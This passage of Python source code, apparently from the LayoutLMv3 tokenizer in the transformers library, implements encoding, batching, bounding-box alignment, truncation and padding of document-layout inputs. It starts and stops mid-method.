cls = [self.cls_token_id]
if token_ids_1 is None:
return len(cls + token_ids_0 + sep) * [0]
return len(cls + token_ids_0 + sep + sep + token_ids_1 + sep) * [0]
def prepare_for_tokenization(self, text, is_split_into_words=False, **kwargs):
add_prefix_space = kwargs.pop("add_prefix_space", self.add_prefix_space)
# If the text starts with a token that should not be split, no space is added before the text in any case.
# It's necessary to match the fast tokenization
if (
(is_split_into_words or add_prefix_space)
and (len(text) > 0 and not text[0].isspace())
and sum([text.startswith(no_split_token) for no_split_token in self.unique_no_split_tokens]) == 0
):
text = " " + text
return (text, kwargs)
@add_end_docstrings(LAYOUTLMV3_ENCODE_KWARGS_DOCSTRING, LAYOUTLMV3_ENCODE_PLUS_ADDITIONAL_KWARGS_DOCSTRING)
# Copied from transformers.models.layoutlmv2.tokenization_layoutlmv2.LayoutLMv2Tokenizer.__call__
def __call__(
self,
text: Union[TextInput, PreTokenizedInput, List[TextInput], List[PreTokenizedInput]],
text_pair: Optional[Union[PreTokenizedInput, List[PreTokenizedInput]]] = None,
boxes: Union[List[List[int]], List[List[List[int]]]] = None,
word_labels: Optional[Union[List[int], List[List[int]]]] = None,
add_special_tokens: bool = True,
padding: Union[bool, str, PaddingStrategy] = False,
truncation: Union[bool, str, TruncationStrategy] = None,
max_length: Optional[int] = None,
stride: int = 0,
pad_to_multiple_of: Optional[int] = None,
return_tensors: Optional[Union[str, TensorType]] = None,
return_token_type_ids: Optional[bool] = None,
return_attention_mask: Optional[bool] = None,
return_overflowing_tokens: bool = False,
return_special_tokens_mask: bool = False,
return_offsets_mapping: bool = False,
return_length: bool = False,
verbose: bool = True,
**kwargs,
) -> BatchEncoding:
"""
Main method to tokenize and prepare for the model one or several sequence(s) or one or several pair(s) of
sequences with word-level normalized bounding boxes and optional labels.
Args:
text (`str`, `List[str]`, `List[List[str]]`):
The sequence or batch of sequences to be encoded. Each sequence can be a string, a list of strings
(words of a single example or questions of a batch of examples) or a list of list of strings (batch of
words).
text_pair (`List[str]`, `List[List[str]]`):
The sequence or batch of sequences to be encoded. Each sequence should be a list of strings
(pretokenized string).
boxes (`List[List[int]]`, `List[List[List[int]]]`):
Word-level bounding boxes. Each bounding box should be normalized to be on a 0-1000 scale.
word_labels (`List[int]`, `List[List[int]]`, *optional*):
Word-level integer labels (for token classification tasks such as FUNSD, CORD).
"""
# Input type checking for clearer error
def _is_valid_text_input(t):
if isinstance(t, str):
# Strings are fine
return True
elif isinstance(t, (list, tuple)):
# List are fine as long as they are...
if len(t) == 0:
# ... empty
return True
elif isinstance(t[0], str):
# ... list of strings
return True
elif isinstance(t[0], (list, tuple)):
# ... list with an empty list or with a list of strings
return len(t[0]) == 0 or isinstance(t[0][0], str)
else:
return False
else:
return False
if text_pair is not None:
# in case text + text_pair are provided, text = questions, text_pair = words
if not _is_valid_text_input(text):
raise ValueError("text input must of type `str` (single example) or `List[str]` (batch of examples). ")
if not isinstance(text_pair, (list, tuple)):
raise ValueError(
"Words must be of type `List[str]` (single pretokenized example), "
"or `List[List[str]]` (batch of pretokenized examples)."
)
else:
# in case only text is provided => must be words
if not isinstance(text, (list, tuple)):
raise ValueError(
"Words must be of type `List[str]` (single pretokenized example), "
"or `List[List[str]]` (batch of pretokenized examples)."
)
if text_pair is not None:
is_batched = isinstance(text, (list, tuple))
else:
is_batched = isinstance(text, (list, tuple)) and text and isinstance(text[0], (list, tuple))
words = text if text_pair is None else text_pair
if boxes is None:
raise ValueError("You must provide corresponding bounding boxes")
if is_batched:
if len(words) != len(boxes):
raise ValueError("You must provide words and boxes for an equal amount of examples")
for words_example, boxes_example in zip(words, boxes):
if len(words_example) != len(boxes_example):
raise ValueError("You must provide as many words as there are bounding boxes")
else:
if len(words) != len(boxes):
raise ValueError("You must provide as many words as there are bounding boxes")
if is_batched:
if text_pair is not None and len(text) != len(text_pair):
raise ValueError(
f"batch length of `text`: {len(text)} does not match batch length of `text_pair`:"
f" {len(text_pair)}."
)
batch_text_or_text_pairs = list(zip(text, text_pair)) if text_pair is not None else text
is_pair = bool(text_pair is not None)
return self.batch_encode_plus(
batch_text_or_text_pairs=batch_text_or_text_pairs,
is_pair=is_pair,
boxes=boxes,
word_labels=word_labels,
add_special_tokens=add_special_tokens,
padding=padding,
truncation=truncation,
max_length=max_length,
stride=stride,
pad_to_multiple_of=pad_to_multiple_of,
return_tensors=return_tensors,
return_token_type_ids=return_token_type_ids,
return_attention_mask=return_attention_mask,
return_overflowing_tokens=return_overflowing_tokens,
return_special_tokens_mask=return_special_tokens_mask,
return_offsets_mapping=return_offsets_mapping,
return_length=return_length,
verbose=verbose,
**kwargs,
)
else:
return self.encode_plus(
text=text,
text_pair=text_pair,
boxes=boxes,
word_labels=word_labels,
add_special_tokens=add_special_tokens,
padding=padding,
truncation=truncation,
max_length=max_length,
stride=stride,
pad_to_multiple_of=pad_to_multiple_of,
return_tensors=return_tensors,
return_token_type_ids=return_token_type_ids,
return_attention_mask=return_attention_mask,
return_overflowing_tokens=return_overflowing_tokens,
return_special_tokens_mask=return_special_tokens_mask,
return_offsets_mapping=return_offsets_mapping,
return_length=return_length,
verbose=verbose,
**kwargs,
)
@add_end_docstrings(LAYOUTLMV3_ENCODE_KWARGS_DOCSTRING, LAYOUTLMV3_ENCODE_PLUS_ADDITIONAL_KWARGS_DOCSTRING)
# Copied from transformers.models.layoutlmv2.tokenization_layoutlmv2.LayoutLMv2Tokenizer.batch_encode_plus
def batch_encode_plus(
self,
batch_text_or_text_pairs: Union[
List[TextInput],
List[TextInputPair],
List[PreTokenizedInput],
],
is_pair: bool = None,
boxes: Optional[List[List[List[int]]]] = None,
word_labels: Optional[Union[List[int], List[List[int]]]] = None,
add_special_tokens: bool = True,
padding: Union[bool, str, PaddingStrategy] = False,
truncation: Union[bool, str, TruncationStrategy] = None,
max_length: Optional[int] = None,
stride: int = 0,
pad_to_multiple_of: Optional[int] = None,
return_tensors: Optional[Union[str, TensorType]] = None,
return_token_type_ids: Optional[bool] = None,
return_attention_mask: Optional[bool] = None,
return_overflowing_tokens: bool = False,
return_special_tokens_mask: bool = False,
return_offsets_mapping: bool = False,
return_length: bool = False,
verbose: bool = True,
**kwargs,
) -> BatchEncoding:
# Backward compatibility for 'truncation_strategy', 'pad_to_max_length'
padding_strategy, truncation_strategy, max_length, kwargs = self._get_padding_truncation_strategies(
padding=padding,
truncation=truncation,
max_length=max_length,
pad_to_multiple_of=pad_to_multiple_of,
verbose=verbose,
**kwargs,
)
return self._batch_encode_plus(
batch_text_or_text_pairs=batch_text_or_text_pairs,
is_pair=is_pair,
boxes=boxes,
word_labels=word_labels,
add_special_tokens=add_special_tokens,
padding_strategy=padding_strategy,
truncation_strategy=truncation_strategy,
max_length=max_length,
stride=stride,
pad_to_multiple_of=pad_to_multiple_of,
return_tensors=return_tensors,
return_token_type_ids=return_token_type_ids,
return_attention_mask=return_attention_mask,
return_overflowing_tokens=return_overflowing_tokens,
return_special_tokens_mask=return_special_tokens_mask,
return_offsets_mapping=return_offsets_mapping,
return_length=return_length,
verbose=verbose,
**kwargs,
)
# Copied from transformers.models.layoutlmv2.tokenization_layoutlmv2.LayoutLMv2Tokenizer._batch_encode_plus
def _batch_encode_plus(
self,
batch_text_or_text_pairs: Union[
List[TextInput],
List[TextInputPair],
List[PreTokenizedInput],
],
is_pair: bool = None,
boxes: Optional[List[List[List[int]]]] = None,
word_labels: Optional[List[List[int]]] = None,
add_special_tokens: bool = True,
padding_strategy: PaddingStrategy = PaddingStrategy.DO_NOT_PAD,
truncation_strategy: TruncationStrategy = TruncationStrategy.DO_NOT_TRUNCATE,
max_length: Optional[int] = None,
stride: int = 0,
pad_to_multiple_of: Optional[int] = None,
return_tensors: Optional[Union[str, TensorType]] = None,
return_token_type_ids: Optional[bool] = None,
return_attention_mask: Optional[bool] = None,
return_overflowing_tokens: bool = False,
return_special_tokens_mask: bool = False,
return_offsets_mapping: bool = False,
return_length: bool = False,
verbose: bool = True,
**kwargs,
) -> BatchEncoding:
if return_offsets_mapping:
raise NotImplementedError(
"return_offset_mapping is not available when using Python tokenizers. "
"To use this feature, change your tokenizer to one deriving from "
"transformers.PreTrainedTokenizerFast."
)
batch_outputs = self._batch_prepare_for_model(
batch_text_or_text_pairs=batch_text_or_text_pairs,
is_pair=is_pair,
boxes=boxes,
word_labels=word_labels,
add_special_tokens=add_special_tokens,
padding_strategy=padding_strategy,
truncation_strategy=truncation_strategy,
max_length=max_length,
stride=stride,
pad_to_multiple_of=pad_to_multiple_of,
return_attention_mask=return_attention_mask,
return_token_type_ids=return_token_type_ids,
return_overflowing_tokens=return_overflowing_tokens,
return_special_tokens_mask=return_special_tokens_mask,
return_length=return_length,
return_tensors=return_tensors,
verbose=verbose,
)
return BatchEncoding(batch_outputs)
@add_end_docstrings(LAYOUTLMV3_ENCODE_KWARGS_DOCSTRING, LAYOUTLMV3_ENCODE_PLUS_ADDITIONAL_KWARGS_DOCSTRING)
# Copied from transformers.models.layoutlmv2.tokenization_layoutlmv2.LayoutLMv2Tokenizer._batch_prepare_for_model
def _batch_prepare_for_model(
self,
batch_text_or_text_pairs,
is_pair: bool = None,
boxes: Optional[List[List[int]]] = None,
word_labels: Optional[List[List[int]]] = None,
add_special_tokens: bool = True,
padding_strategy: PaddingStrategy = PaddingStrategy.DO_NOT_PAD,
truncation_strategy: TruncationStrategy = TruncationStrategy.DO_NOT_TRUNCATE,
max_length: Optional[int] = None,
stride: int = 0,
pad_to_multiple_of: Optional[int] = None,
return_tensors: Optional[str] = None,
return_token_type_ids: Optional[bool] = None,
return_attention_mask: Optional[bool] = None,
return_overflowing_tokens: bool = False,
return_special_tokens_mask: bool = False,
return_length: bool = False,
verbose: bool = True,
) -> BatchEncoding:
"""
Prepares a sequence of input id, or a pair of sequences of inputs ids so that it can be used by the model. It
adds special tokens, truncates sequences if overflowing while taking into account the special tokens and
manages a moving window (with user defined stride) for overflowing tokens.
Args:
batch_ids_pairs: list of tokenized input ids or input ids pairs
"""
batch_outputs = {}
for idx, example in enumerate(zip(batch_text_or_text_pairs, boxes)):
batch_text_or_text_pair, boxes_example = example
outputs = self.prepare_for_model(
batch_text_or_text_pair[0] if is_pair else batch_text_or_text_pair,
batch_text_or_text_pair[1] if is_pair else None,
boxes_example,
word_labels=word_labels[idx] if word_labels is not None else None,
add_special_tokens=add_special_tokens,
padding=PaddingStrategy.DO_NOT_PAD.value, # we pad in batch afterward
truncation=truncation_strategy.value,
max_length=max_length,
stride=stride,
pad_to_multiple_of=None, # we pad in batch afterward
return_attention_mask=False, # we pad in batch afterward
return_token_type_ids=return_token_type_ids,
return_overflowing_tokens=return_overflowing_tokens,
return_special_tokens_mask=return_special_tokens_mask,
return_length=return_length,
return_tensors=None, # We convert the whole batch to tensors at the end
prepend_batch_axis=False,
verbose=verbose,
)
for key, value in outputs.items():
if key not in batch_outputs:
batch_outputs[key] = []
batch_outputs[key].append(value)
batch_outputs = self.pad(
batch_outputs,
padding=padding_strategy.value,
max_length=max_length,
pad_to_multiple_of=pad_to_multiple_of,
return_attention_mask=return_attention_mask,
)
batch_outputs = BatchEncoding(batch_outputs, tensor_type=return_tensors)
return batch_outputs
@add_end_docstrings(LAYOUTLMV3_ENCODE_KWARGS_DOCSTRING)
# Copied from transformers.models.layoutlmv2.tokenization_layoutlmv2.LayoutLMv2Tokenizer.encode
def encode(
self,
text: Union[TextInput, PreTokenizedInput],
text_pair: Optional[PreTokenizedInput] = None,
boxes: Optional[List[List[int]]] = None,
word_labels: Optional[List[int]] = None,
add_special_tokens: bool = True,
padding: Union[bool, str, PaddingStrategy] = False,
truncation: Union[bool, str, TruncationStrategy] = None,
max_length: Optional[int] = None,
stride: int = 0,
pad_to_multiple_of: Optional[int] = None,
return_tensors: Optional[Union[str, TensorType]] = None,
return_token_type_ids: Optional[bool] = None,
return_attention_mask: Optional[bool] = None,
return_overflowing_tokens: bool = False,
return_special_tokens_mask: bool = False,
return_offsets_mapping: bool = False,
return_length: bool = False,
verbose: bool = True,
**kwargs,
) -> List[int]:
encoded_inputs = self.encode_plus(
text=text,
text_pair=text_pair,
boxes=boxes,
word_labels=word_labels,
add_special_tokens=add_special_tokens,
padding=padding,
truncation=truncation,
max_length=max_length,
stride=stride,
pad_to_multiple_of=pad_to_multiple_of,
return_tensors=return_tensors,
return_token_type_ids=return_token_type_ids,
return_attention_mask=return_attention_mask,
return_overflowing_tokens=return_overflowing_tokens,
return_special_tokens_mask=return_special_tokens_mask,
return_offsets_mapping=return_offsets_mapping,
return_length=return_length,
verbose=verbose,
**kwargs,
)
return encoded_inputs["input_ids"]
@add_end_docstrings(LAYOUTLMV3_ENCODE_KWARGS_DOCSTRING, LAYOUTLMV3_ENCODE_PLUS_ADDITIONAL_KWARGS_DOCSTRING)
# Copied from transformers.models.layoutlmv2.tokenization_layoutlmv2.LayoutLMv2Tokenizer.encode_plus
def encode_plus(
self,
text: Union[TextInput, PreTokenizedInput],
text_pair: Optional[PreTokenizedInput] = None,
boxes: Optional[List[List[int]]] = None,
word_labels: Optional[List[int]] = None,
add_special_tokens: bool = True,
padding: Union[bool, str, PaddingStrategy] = False,
truncation: Union[bool, str, TruncationStrategy] = None,
max_length: Optional[int] = None,
stride: int = 0,
pad_to_multiple_of: Optional[int] = None,
return_tensors: Optional[Union[str, TensorType]] = None,
return_token_type_ids: Optional[bool] = None,
return_attention_mask: Optional[bool] = None,
return_overflowing_tokens: bool = False,
return_special_tokens_mask: bool = False,
return_offsets_mapping: bool = False,
return_length: bool = False,
verbose: bool = True,
**kwargs,
) -> BatchEncoding:
"""
Tokenize and prepare for the model a sequence or a pair of sequences. .. warning:: This method is deprecated,
`__call__` should be used instead.
Args:
text (`str`, `List[str]`, `List[List[str]]`):
The first sequence to be encoded. This can be a string, a list of strings or a list of list of strings.
text_pair (`List[str]` or `List[int]`, *optional*):
Optional second sequence to be encoded. This can be a list of strings (words of a single example) or a
list of list of strings (words of a batch of examples).
"""
# Backward compatibility for 'truncation_strategy', 'pad_to_max_length'
padding_strategy, truncation_strategy, max_length, kwargs = self._get_padding_truncation_strategies(
padding=padding,
truncation=truncation,
max_length=max_length,
pad_to_multiple_of=pad_to_multiple_of,
verbose=verbose,
**kwargs,
)
return self._encode_plus(
text=text,
boxes=boxes,
text_pair=text_pair,
word_labels=word_labels,
add_special_tokens=add_special_tokens,
padding_strategy=padding_strategy,
truncation_strategy=truncation_strategy,
max_length=max_length,
stride=stride,
pad_to_multiple_of=pad_to_multiple_of,
return_tensors=return_tensors,
return_token_type_ids=return_token_type_ids,
return_attention_mask=return_attention_mask,
return_overflowing_tokens=return_overflowing_tokens,
return_special_tokens_mask=return_special_tokens_mask,
return_offsets_mapping=return_offsets_mapping,
return_length=return_length,
verbose=verbose,
**kwargs,
)
# Copied from transformers.models.layoutlmv2.tokenization_layoutlmv2.LayoutLMv2Tokenizer._encode_plus
def _encode_plus(
self,
text: Union[TextInput, PreTokenizedInput],
text_pair: Optional[PreTokenizedInput] = None,
boxes: Optional[List[List[int]]] = None,
word_labels: Optional[List[int]] = None,
add_special_tokens: bool = True,
padding_strategy: PaddingStrategy = PaddingStrategy.DO_NOT_PAD,
truncation_strategy: TruncationStrategy = TruncationStrategy.DO_NOT_TRUNCATE,
max_length: Optional[int] = None,
stride: int = 0,
pad_to_multiple_of: Optional[int] = None,
return_tensors: Optional[Union[str, TensorType]] = None,
return_token_type_ids: Optional[bool] = None,
return_attention_mask: Optional[bool] = None,
return_overflowing_tokens: bool = False,
return_special_tokens_mask: bool = False,
return_offsets_mapping: bool = False,
return_length: bool = False,
verbose: bool = True,
**kwargs,
) -> BatchEncoding:
if return_offsets_mapping:
raise NotImplementedError(
"return_offset_mapping is not available when using Python tokenizers. "
"To use this feature, change your tokenizer to one deriving from "
"transformers.PreTrainedTokenizerFast. "
"More information on available tokenizers at "
"https://github.com/huggingface/transformers/pull/2674"
)
return self.prepare_for_model(
text=text,
text_pair=text_pair,
boxes=boxes,
word_labels=word_labels,
add_special_tokens=add_special_tokens,
padding=padding_strategy.value,
truncation=truncation_strategy.value,
max_length=max_length,
stride=stride,
pad_to_multiple_of=pad_to_multiple_of,
return_tensors=return_tensors,
prepend_batch_axis=True,
return_attention_mask=return_attention_mask,
return_token_type_ids=return_token_type_ids,
return_overflowing_tokens=return_overflowing_tokens,
return_special_tokens_mask=return_special_tokens_mask,
return_length=return_length,
verbose=verbose,
)
@add_end_docstrings(LAYOUTLMV3_ENCODE_KWARGS_DOCSTRING, LAYOUTLMV3_ENCODE_PLUS_ADDITIONAL_KWARGS_DOCSTRING)
def prepare_for_model(
self,
text: Union[TextInput, PreTokenizedInput],
text_pair: Optional[PreTokenizedInput] = None,
boxes: Optional[List[List[int]]] = None,
word_labels: Optional[List[int]] = None,
add_special_tokens: bool = True,
padding: Union[bool, str, PaddingStrategy] = False,
truncation: Union[bool, str, TruncationStrategy] = None,
max_length: Optional[int] = None,
stride: int = 0,
pad_to_multiple_of: Optional[int] = None,
return_tensors: Optional[Union[str, TensorType]] = None,
return_token_type_ids: Optional[bool] = None,
return_attention_mask: Optional[bool] = None,
return_overflowing_tokens: bool = False,
return_special_tokens_mask: bool = False,
return_offsets_mapping: bool = False,
return_length: bool = False,
verbose: bool = True,
prepend_batch_axis: bool = False,
**kwargs,
) -> BatchEncoding:
"""
Prepares a sequence or a pair of sequences so that it can be used by the model. It adds special tokens,
truncates sequences if overflowing while taking into account the special tokens and manages a moving window
(with user defined stride) for overflowing tokens. Please Note, for *text_pair* different than `None` and
*truncation_strategy = longest_first* or `True`, it is not possible to return overflowing tokens. Such a
combination of arguments will raise an error.
Word-level `boxes` are turned into token-level `bbox`. If provided, word-level `word_labels` are turned into
token-level `labels`. The word label is used for the first token of the word, while remaining tokens are
labeled with -100, such that they will be ignored by the loss function.
Args:
text (`str`, `List[str]`, `List[List[str]]`):
The first sequence to be encoded. This can be a string, a list of strings or a list of list of strings.
text_pair (`List[str]` or `List[int]`, *optional*):
Optional second sequence to be encoded. This can be a list of strings (words of a single example) or a
list of list of strings (words of a batch of examples).
"""
# Backward compatibility for 'truncation_strategy', 'pad_to_max_length'
padding_strategy, truncation_strategy, max_length, kwargs = self._get_padding_truncation_strategies(
padding=padding,
truncation=truncation,
max_length=max_length,
pad_to_multiple_of=pad_to_multiple_of,
verbose=verbose,
**kwargs,
)
tokens = []
pair_tokens = []
token_boxes = []
pair_token_boxes = []
labels = []
if text_pair is None:
if word_labels is None:
# CASE 1: document image classification (training + inference) + CASE 2: token classification (inference)
for word, box in zip(text, boxes):
if len(word) < 1: # skip empty words
continue
word_tokens = self.tokenize(word)
tokens.extend(word_tokens)
token_boxes.extend([box] * len(word_tokens))
else:
# CASE 2: token classification (training)
for word, box, label in zip(text, boxes, word_labels):
if len(word) < 1: # skip empty words
continue
word_tokens = self.tokenize(word)
tokens.extend(word_tokens)
token_boxes.extend([box] * len(word_tokens))
if self.only_label_first_subword:
# Use the real label id for the first token of the word, and padding ids for the remaining tokens
labels.extend([label] + [self.pad_token_label] * (len(word_tokens) - 1))
else:
labels.extend([label] * len(word_tokens))
else:
# CASE 3: document visual question answering (inference)
# text = question
# text_pair = words
tokens = self.tokenize(text)
token_boxes = [self.pad_token_box for _ in range(len(tokens))]
for word, box in zip(text_pair, boxes):
if len(word) < 1: # skip empty words
continue
word_tokens = self.tokenize(word)
pair_tokens.extend(word_tokens)
pair_token_boxes.extend([box] * len(word_tokens))
# Create ids + pair_ids
ids = self.convert_tokens_to_ids(tokens)
pair_ids = self.convert_tokens_to_ids(pair_tokens) if pair_tokens else None
if (
return_overflowing_tokens
and truncation_strategy == TruncationStrategy.LONGEST_FIRST
and pair_ids is not None
):
raise ValueError(
"Not possible to return overflowing tokens for pair of sequences with the "
"`longest_first`. Please select another truncation strategy than `longest_first`, "
"for instance `only_second` or `only_first`."
)
# Compute the total size of the returned encodings
pair = bool(pair_ids is not None)
len_ids = len(ids)
len_pair_ids = len(pair_ids) if pair else 0
total_len = len_ids + len_pair_ids + (self.num_special_tokens_to_add(pair=pair) if add_special_tokens else 0)
# Truncation: Handle max sequence length
overflowing_tokens = []
overflowing_token_boxes = []
overflowing_labels = []
if truncation_strategy != TruncationStrategy.DO_NOT_TRUNCATE and max_length and total_len > max_length:
(
ids,
token_boxes,
pair_ids,
pair_token_boxes,
labels,
overflowing_tokens,
overflowing_token_boxes,
overflowing_labels,
) = self.truncate_sequences(
ids,
token_boxes,
pair_ids=pair_ids,
pair_token_boxes=pair_token_boxes,
labels=labels,
num_tokens_to_remove=total_len - max_length,
truncation_strategy=truncation_strategy,
stride=stride,
)
if return_token_type_ids and not add_special_tokens:
raise ValueError(
"Asking to return token_type_ids while setting add_special_tokens to False "
"results in an undefined behavior. Please set add_special_tokens to True or "
"set return_token_type_ids to None."
)
# Load from model defaults
if return_token_type_ids is None:
return_token_type_ids = "token_type_ids" in self.model_input_names
if return_attention_mask is None:
return_attention_mask = "attention_mask" in self.model_input_names
encoded_inputs = {}
if return_overflowing_tokens:
encoded_inputs["overflowing_tokens"] = overflowing_tokens
encoded_inputs["overflowing_token_boxes"] = overflowing_token_boxes
encoded_inputs["overflowing_labels"] = overflowing_labels
encoded_inputs["num_truncated_tokens"] = total_len - max_length
# Add special tokens
if add_special_tokens:
sequence = self.build_inputs_with_special_tokens(ids, pair_ids)
token_type_ids = self.create_token_type_ids_from_sequences(ids, pair_ids)
token_boxes = [self.cls_token_box] + token_boxes + [self.sep_token_box]
if pair_token_boxes:
pair_token_boxes = [self.sep_token_box] + pair_token_boxes + [self.sep_token_box]
token_boxes = token_boxes + pair_token_boxes if pair else token_boxes
if labels:
labels = [self.pad_token_label] + labels + [self.pad_token_label]
else:
sequence = ids + pair_ids if pair else ids
token_type_ids = [0] * len(ids) + ([0] * len(pair_ids) if pair else [])
token_boxes = token_boxes + pair_token_boxes if pair else token_boxes
# Build output dictionary
encoded_inputs["input_ids"] = sequence
encoded_inputs["bbox"] = token_boxes
if return_token_type_ids:
encoded_inputs["token_type_ids"] = token_type_ids
if return_special_tokens_mask:
if add_special_tokens:
encoded_inputs["special_tokens_mask"] = self.get_special_tokens_mask(ids, pair_ids)
else:
encoded_inputs["special_tokens_mask"] = [0] * len(sequence)
if labels:
encoded_inputs["labels"] = labels
# Check lengths
self._eventual_warn_about_too_long_sequence(encoded_inputs["input_ids"], max_length, verbose)
# Padding
if padding_strategy != PaddingStrategy.DO_NOT_PAD or return_attention_mask:
encoded_inputs = self.pad(
encoded_inputs,
max_length=max_length,
padding=padding_strategy.value,
pad_to_multiple_of=pad_to_multiple_of,
return_attention_mask=return_attention_mask,
)
if return_length:
encoded_inputs["length"] = len(encoded_inputs["input_ids"])
batch_outputs = BatchEncoding(
encoded_inputs, tensor_type=return_tensors, prepend_batch_axis=prepend_batch_axis
)
return batch_outputs
# Copied from transformers.models.layoutlmv2.tokenization_layoutlmv2.LayoutLMv2Tokenizer.truncate_sequences
def truncate_sequences(
self,
ids: List[int],
token_boxes: List[List[int]],
pair_ids: Optional[List[int]] = None,
pair_token_boxes: Optional[List[List[int]]] = None,
labels: Optional[List[int]] = None,
num_tokens_to_remove: int = 0,
truncation_strategy: Union[str, TruncationStrategy] = "longest_first",
stride: int = 0,
) -> Tuple[List[int], List[int], List[int]]:
"""
Truncates a sequence pair in-place following the strategy.
Args:
ids (`List[int]`):
Tokenized input ids of the first sequence. Can be obtained from a string by chaining the `tokenize` and
`convert_tokens_to_ids` methods.
token_boxes (`List[List[int]]`):
Bounding boxes of the first sequence.
pair_ids (`List[int]`, *optional*):
Tokenized input ids of the second sequence. Can be obtained from a string by chaining the `tokenize`
and `convert_tokens_to_ids` methods.
pair_token_boxes (`List[List[int]]`, *optional*):
Bounding boxes of the second sequence.
labels (`List[int]`, *optional*):
Labels of the first sequence (for token classification tasks).
num_tokens_to_remove (`int`, *optional*, defaults to 0):
Number of tokens to remove using the truncation strategy.
truncation_strategy (`str` or [`~tokenization_utils_base.TruncationStrategy`], *optional*, defaults to `False`):
The strategy to follow for truncation. Can be:
- `'longest_first'`: Truncate to a maximum length specified with the argument `max_length` or to the
maximum acceptable input length for the model if that argument is not provided. This will truncate
token by token, removing a token from the longest sequence in the pair if a pair of sequences (or a
batch of pairs) is provided.
- `'only_first'`: Truncate to a maximum length specified with the argument `max_length` or to the
maximum acceptable input length for the model if that argument is not provided. This will only
truncate the first sequence of a pair if a pair of sequences (or a batch of pairs) is provided.
- `'only_second'`: Truncate to a maximum length specified with the argument `max_length` or to the
maximum acceptable input length for the model if that argument is not provided. This will only
truncate the second sequence of a pair if a pair of sequences (or a batch of pairs) is provided.
- `'do_not_truncate'` (default): No truncation (i.e., can output batch with sequence lengths greater
than the model maximum admissible input size).
stride (`int`, *optional*, defaults to 0):
If set to a positive number, the overflowing tokens returned will contain some tokens from the main
sequence returned. The value of this argument defines the number of additional tokens.
Returns:
`Tuple[List[int], List[int], List[int]]`: The truncated `ids`, the truncated `pair_ids` and the list of
overflowing tokens. Note: The *longest_first* strategy returns empty list of overflowing tokens if a pair
of sequences (or a batch of pairs) is provided.
"""
if num_tokens_to_remove <= 0:
return ids, token_boxes, pair_ids, pair_token_boxes, labels, [], [], []
if not isinstance(truncation_strategy, TruncationStrategy):
truncation_strategy = TruncationStrategy(truncation_strategy)
overflowing_tokens = []
overflowing_token_boxes = []
overflowing_labels = []
if truncation_strategy == TruncationStrategy.ONLY_FIRST or (
truncation_strategy == TruncationStrategy.LONGEST_FIRST and pair_ids is None
):
if len(ids) > num_tokens_to_remove:
window_len = min(len(ids), stride + num_tokens_to_remove)
overflowing_tokens = ids[-window_len:]
overflowing_token_boxes = token_boxes[-window_len:]
overflowing_labels = labels[-window_len:]
ids = ids[:-num_tokens_to_remove]
token_boxes = token_boxes[:-num_tokens_to_remove]
labels = labels[:-num_tokens_to_remove]
else:
error_msg = (
f"We need to remove {num_tokens_to_remove} to truncate the input "
f"but the first sequence has a length {len(ids)}. "
)
if truncation_strategy == TruncationStrategy.ONLY_FIRST:
error_msg = (
error_msg + "Please select another truncation strategy than "
f"{truncation_strategy}, for instance 'longest_first' or 'only_second'."
)
logger.error(error_msg)
elif truncation_strategy == TruncationStrategy.LONGEST_FIRST:
logger.warning(
"Be aware, overflowing tokens are not returned for the setting you have chosen,"
f" i.e. sequence pairs with the '{TruncationStrategy.LONGEST_FIRST.value}' "
"truncation strategy. So the returned list will always be empty even if some "
"tokens have been removed."
)
for _ in range(num_tokens_to_remove):
if pair_ids is None or len(ids) > len(pair_ids):
ids = ids[:-1]
token_boxes = token_boxes[:-1]
labels = labels[:-1]
else:
pair_ids = pair_ids[:-1]
pair_token_boxes = pair_token_boxes[:-1]
elif truncation_strategy == TruncationStrategy.ONLY_SECOND and pair_ids is not None:
if len(pair_ids) > num_tokens_to_remove:
window_len = min(len(pair_ids), stride + num_tokens_to_remove)
overflowing_tokens = pair_ids[-window_len:]
overflowing_token_boxes = pair_token_boxes[-window_len:]
pair_ids = pair_ids[:-num_tokens_to_remove]
pair_token_boxes = pair_token_boxes[:-num_tokens_to_remove]
else:
logger.error(
f"We need to remove {num_tokens_to_remove} to truncate the input "
f"but the second sequence has a length {len(pair_ids)}. "
f"Please select another truncation strategy than {truncation_strategy}, "
"for instance 'longest_first' or 'only_first'."
)
return (
ids,
token_boxes,
pair_ids,
pair_token_boxes,
labels,
overflowing_tokens,
overflowing_token_boxes,
overflowing_labels,
)
# Copied from transformers.models.layoutlmv2.tokenization_layoutlmv2.LayoutLMv2Tokenizer._pad
def _pad(
self,
encoded_inputs: Union[Dict[str, EncodedInput], BatchEncoding],
max_length: Optional[int] = None,
padding_strategy: PaddingStrategy = PaddingStrategy.DO_NOT_PAD,
pad_to_multiple_of: Optional[int] = None,
return_attention_mask: Optional[bool] = None,
) -> dict:
"""
Pad encoded inputs (on left/right and up to predefined length or max length in the batch)
Args:
encoded_inputs:
Dictionary of tokenized inputs (`List[int]`) or batch of tokenized inputs (`List[List[int]]`).
max_length: maximum length of the returned list and optionally padding length (see below).
Will truncate by taking into account the special tokens.
padding_strategy: PaddingStrategy to use for padding.
- PaddingStrategy.LONGEST Pad to the longest sequence in the batch
- PaddingStrategy.MAX_LENGTH: Pad to the max length (default)
- PaddingStrategy.DO_NOT_PAD: Do not pad
The tokenizer padding sides are defined in self.padding_side:
- 'left': pads on the left of the sequences
- 'right': pads on the right of the sequences
pad_to_multiple_of: (optional) Integer if set will pad the sequence to a multiple of the provided value.
This is especially useful to enable the use of Tensor Core on NVIDIA hardware with compute capability
`>= 7.5` (Volta).
return_attention_mask:
(optional) Set to False to avoid returning attention mask (default: set to model specifics)
"""
# Load from model defaults
if return_attention_mask is None:
return_attention_mask = "attention_mask" in self.model_input_names
required_input = encoded_inputs[self.model_input_names[0]]
if padding_strategy == PaddingStrategy.LONGEST:
max_length = len(required_input)
if max_length is not None and pad_to_multiple_of is not None and (max_length % pad_to_multiple_of != 0):
max_length = ((max_length // pad_to_multiple_of) + 1) * pad_to_multiple_of
needs_to_be_padded = padding_strategy != PaddingStrategy.DO_NOT_PAD and len(required_input) != max_length
# Initialize attention mask if not present.
if return_attention_mask and "attention_mask" not in encoded_inputs:
encoded_inputs["attention_mask"] = [1] * len(required_input)
if needs_to_be_padded:
difference = max_length - len(required_input)
if self.padding_side == "right":
if return_attention_mask:
encoded_inputs["attention_mask"] = encoded_inputs["attention_mask"] + [0] * difference
if "token_type_ids" in encoded_inputs:
encoded_inputs["token_type_ids"] = (
encoded_inputs["token_type_ids"] + [self.pad_token_type_id] * difference
)
if "bbox" in encoded_inputs:
encoded_inputs["bbox"] = encoded_inputs["bbox"] + [self.pad_token_box] * difference
if "labels" in encoded_inputs:
